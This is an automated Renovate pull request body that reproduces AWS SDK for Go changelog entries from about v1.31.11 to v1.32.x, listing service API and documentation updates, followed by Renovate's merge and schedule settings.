  • AWS Snowcone is a portable, rugged and secure device for edge computing and data transfer. You can use Snowcone to collect, process, and move data to AWS, either offline by shipping the device to AWS or online by using AWS DataSync. With 2 CPUs and 4 GB RAM of compute and 8 TB of storage, Snowcone can run edge computing workloads and store data securely. Snowcone's small size (8.94" x 5.85" x 3.25" / 227 mm x 148.6 mm x 82.65 mm) allows you to set it next to machinery in a factory. Snowcone weighs about 4.5 lbs. (2 kg), so you can carry one in a backpack, use it with battery-based operation, and use the Wi-Fi interface to gather sensor data. Snowcone supports a file interface with NFS support.

SDK Enhancements

• private/protocol: Adds support for decimal precision UNIX timestamps up to thousandths of a second (#​3376)

v1.32.3

Compare Source

===

Service Client Updates

• service/autoscaling: Updates service API and documentation
  • Introducing instance refresh, a feature that helps you update all instances in an Auto Scaling group in a rolling fashion (for example, to apply a new AMI or instance type). You can control the pace of the refresh by defining the percentage of the group that must remain running/healthy during the replacement process and the time for new instances to warm up between replacements.
• service/cloudfront: Updates service documentation
  • Documentation updates for CloudFront
• service/dataexchange: Updates service API
• service/lambda: Updates service API, documentation, and examples
  • Adds support for using Amazon Elastic File System (persistent storage) with AWS Lambda. This enables customers to share data across function invocations, read large reference data files, and write function output to a persistent and shared store.
• service/polly: Updates service API
  • Amazon Polly adds new US English child voice - Kevin. Kevin is available as Neural voice only.
• service/qldb: Updates service documentation

v1.32.2

Compare Source

===

Service Client Updates

• service/alexaforbusiness: Updates service API and documentation
• service/appconfig: Updates service API, documentation, and paginators
• service/chime: Updates service API and documentation
  • feature: Chime: This release introduces the ability to create an AWS Chime SDK meeting with attendees.
• service/cognito-idp: Updates service API and documentation
• service/iot: Updates service API and documentation
  • Added support for job executions rollout configuration, job abort configuration, and job executions timeout configuration for AWS IoT Over-the-Air (OTA) Update Feature.

v1.32.1

Compare Source

===

Service Client Updates

• service/codeguru-reviewer: Updates service API and documentation
• service/comprehendmedical: Updates service API
• service/ec2: Updates service API and documentation
  • Added support for tag-on-create for CreateVpc, CreateEgressOnlyInternetGateway, CreateSecurityGroup, CreateSubnet, CreateNetworkInterface, CreateNetworkAcl, CreateDhcpOptions and CreateInternetGateway. You can now specify tags when creating any of these resources. For more information about tagging, see AWS Tagging Strategies.
• service/ecr: Updates service API and documentation
  • Add a new parameter (ImageDigest) and a new exception (ImageDigestDoesNotMatchException) to PutImage API to support pushing image by digest.
• service/rds: Updates service documentation
  • Documentation updates for rds

v1.32.0

Compare Source

===

Service Client Updates

• service/ecs: Updates service API and documentation
  • This release adds support for deleting capacity providers.
• service/imagebuilder: Updates service API and documentation
• service/lex-models: Updates service API and documentation

SDK Features

• service/iotdataplane: As part of this release, we are introducing a new feature called named shadow, which extends the capability of AWS IoT Device Shadow to support multiple shadows for a single IoT device. With this release, customers can store different device state data into different shadows, and as a result access only the required state data when needed and reduce individual shadow size.

v1.31.15

Compare Source

===

Service Client Updates

• service/appconfig: Updates service API and documentation
• service/codeartifact: Adds new service
• service/compute-optimizer: Updates service API and documentation
• service/dlm: Updates service API
• service/ec2: Updates service API
  • New C6g instances powered by AWS Graviton2 processors and ideal for running advanced, compute-intensive workloads; New R6g instances powered by AWS Graviton2 processors and ideal for running memory-intensive workloads.
• service/lightsail: Updates service documentation
  • Documentation updates for lightsail
• service/macie2: Updates service API and documentation
• service/servicecatalog: Updates service documentation
  • Service Catalog Documentation Update for Integration with AWS Organizations Delegated Administrator feature
• service/shield: Updates service API and documentation
  • Corrections to the supported format for contact phone numbers and to the description for the create subscription action.

SDK Enhancements

• aws/credentials: Update documentation for shared credentials provider to specify the type of credentials it supports retrieving from shared credentials file.
  • Related to #​3328

v1.31.14

Compare Source

===

Service Client Updates

• service/transfer: Updates service API and documentation
  • This release updates the API so customers can test use of Source IP to allow, deny or limit access to data in their S3 buckets after integrating their identity provider.

v1.31.13

Compare Source

===

Service Client Updates

• service/servicediscovery: Updates service API, documentation, and examples
  • Added support for tagging Service and Namespace type resources in Cloud Map
• service/shield: Updates service API, documentation, and paginators
  • This release adds the option for customers to identify a contact name and method that the DDoS Response Team can proactively engage when a Route 53 Health Check that is associated with a Shield protected resource fails.

v1.31.12

Compare Source

===

Service Client Updates

• service/apigateway: Updates service API and documentation
  • Amazon API Gateway now allows customers of REST APIs to skip trust chain validation for backend server certificates for HTTP and VPC Link Integration. This feature enables customers to configure their REST APIs to integrate with backends that are secured with certificates vended from private certificate authorities (CA) or certificates that are self-signed.
• service/cloudfront: Updates service API and documentation
  • Amazon CloudFront adds support for configurable origin connection attempts and origin connection timeout.
• service/elasticbeanstalk: Updates service API and documentation
  • These API changes enable an IAM user to associate an operations role with an Elastic Beanstalk environment, so that the IAM user can call Elastic Beanstalk actions without having access to underlying downstream AWS services that these actions call.
• service/personalize: Updates service API and documentation
• service/personalize-runtime: Updates service API and documentation
• service/pinpoint: Updates service API and documentation
  • This release enables additional functionality for the Amazon Pinpoint journeys feature. With this release, you can send messages through additional channels, including SMS, push notifications, and custom channels.
• service/runtime.sagemaker: Updates service API and documentation
• service/servicecatalog: Updates service API and documentation
  • This release adds support for DescribeProduct and DescribeProductAsAdmin by product name, DescribeProvisioningArtifact by product name or provisioning artifact name, returning launch paths as part of DescribeProduct output and adds maximum length for provisioning artifact name and provisioning artifact description.

v1.31.11

Compare Source

===

Service Client Updates

• service/ec2: Updates service API
  • New C5a instances, the latest generation of EC2's compute-optimized instances featuring AMD's 2nd Generation EPYC processors. C5a instances offer up to 96 vCPUs, 192 GiB of instance memory, 20 Gbps in Network bandwidth; New G4dn.metal bare meta

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.